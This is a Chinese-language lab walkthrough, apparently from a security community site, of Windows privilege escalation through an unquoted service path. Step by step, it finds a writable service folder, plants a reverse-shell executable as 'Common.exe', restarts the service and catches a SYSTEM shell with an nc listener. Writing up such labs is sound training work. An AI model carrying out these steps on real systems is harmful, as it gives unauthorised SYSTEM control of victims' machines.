漏洞原理
查询" unquotedsvc" 服务有没有运行系统权限(SERVICE_START_NAME),BINARY_PATH_NAME是未加引号,并包含的路径 .
sc qc unquotedsvc
运行结果
C:\\Users\\user\\Desktop>sc qc unquotedsvc
sc qc unquotedsvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: unquotedsvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\\Program Files\\Unquoted Path Service\\Common Files\\unquotedpathservice.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Unquoted Path Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\\Users\\user\\Desktop>
sc qc找到它的加载程序路径,可以看到运行的是系统权限
BINARY_PATH_NAME路径没有包含在引号中,服务会按照以下顺序依次读取(有空格就停止一次)
c:\\program.exe
c:\\program files.exe
c:\\program files\\Unquoted.exe
C:\\Program Files\\Unquoted Path.exe
C:\\Program Files\\Unquoted Path Service\\Common.exe
C:\\Program Files\\Unquoted Path Service\\Common Files\\unquotedpathservice.exe
用accesschk.exe对它的路径权限进行检测,检测目前user具备读写权限
C:\\PrivEsc\\accesschk.exe /accepteula -uwdq "C:\\Program Files\\Unquoted Path Service\\"
运行结果
C:\\Users\\user\\Desktop>C:\\PrivEsc\\accesschk.exe /accepteula -uwdq "C:\\Program Files\\Unquoted Path Service\\"
C:\\PrivEsc\\accesschk.exe /accepteula -uwdq "C:\\Program Files\\Unquoted Path Service\\"
C:\\Program Files\\Unquoted Path Service
Medium Mandatory Level (Default) [No-Write-Up]
RW BUILTIN\\Users
RW NT SERVICE\\TrustedInstaller
RW NT AUTHORITY\\SYSTEM
RW BUILTIN\\Administrators
C:\\Users\\user\\Desktop>
然后在运行前写个相同名字,读取到存在就会执行,从而获取到执行权限
copy C:\\Users\\user\\Desktop\\reverse.exe "C:\\Program Files\\Unquoted Path Service\\Common.exe"
运行结果
C:\\Users\\user\\Desktop>copy C:\\Users\\user\\Desktop\\reverse.exe "C:\\Program Files\\Unquoted Path Service\\Common.exe"
copy C:\\Users\\user\\Desktop\\reverse.exe "C:\\Program Files\\Unquoted Path Service\\Common.exe"
1 file(s) copied.
C:\\Users\\user\\Desktop>dir "C:\\Program Files\\Unquoted Path Service"
dir "C:\\Program Files\\Unquoted Path Service"
Volume in drive C has no label.
Volume Serial Number is 54A8-AA62
Directory of C:\\Program Files\\Unquoted Path Service
02/28/2023 07:44 AM <DIR> .
02/28/2023 07:44 AM <DIR> ..
06/05/2020 07:32 AM <DIR> Common Files
02/28/2023 07:42 AM 7,168 Common.exe
1 File(s) 7,168 bytes
3 Dir(s) 30,850,818,048 bytes free
C:\\Users\\user\\Desktop>
攻击机进行监听,重新启动服务就会获得一个继承运行权限的shell
重启服务
net start unquotedsvc
运行结果
C:\\Users\\user\\Desktop>net start unquotedsvc
net start unquotedsvc
The service is not responding to the control function.
More help is available by typing NET HELPMSG 2186.
C:\\Users\\user\\Desktop>
攻击机监听
root@ip-10-10-25-36:~/Desktop# nc -lvnp 6666
Listening on [0.0.0.0] (family 0, port 6666)
Connection from 10.10.52.162 49782 received!
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\\Windows\\system32>whoami
whoami
nt authority\\system
C:\\Windows\\system32>
免责声明:
H4K6技术社区所提供的一切软件、教程、漏洞信息、破解补丁、注册机、注册信息及软硬件解密分析文章等仅限用于学习和研究目的;不得将上述内容用于商业或者非法用途,否则,一切后果请自行承担。H4K6技术社区不承担任何因为技术滥用所产生的连带责任。H4K6技术社区所有发布的信息资源来源于互联网,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!
